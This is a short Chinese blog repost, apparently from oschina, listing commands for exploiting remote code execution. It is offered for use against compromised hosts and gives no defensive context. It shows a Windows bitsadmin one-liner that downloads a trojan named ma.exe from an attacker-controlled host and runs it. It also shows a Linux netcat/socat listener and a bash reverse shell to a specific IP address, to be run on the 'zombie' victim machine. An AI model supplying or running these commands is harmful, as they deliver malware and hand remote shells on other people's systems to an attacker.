远程rce漏洞执行命令

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

# windows
# 首先需要准备一个木马程序ma.exe

bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe

c:\windows\temp\ma.exe

# ma.exe保存在http://www.xxx.com/ma.exe网站的根目录,会直接下载到对方c:\windows\temp目录下
# c:\windows\temp\ma.exe直接执行

# linux
# 本机监听nc -vlp 4444 -e /bin/bash
# 或者用socat 监听
# socat TCP-LISTEN:233 readline
# 肉鸡执行
bash -i >& /dev/tcp/122.115.47.39/233 0>&1

 

转载于:https://my.oschina.net/9199771/blog/1940992

你可能感兴趣的:(远程rce漏洞执行命令)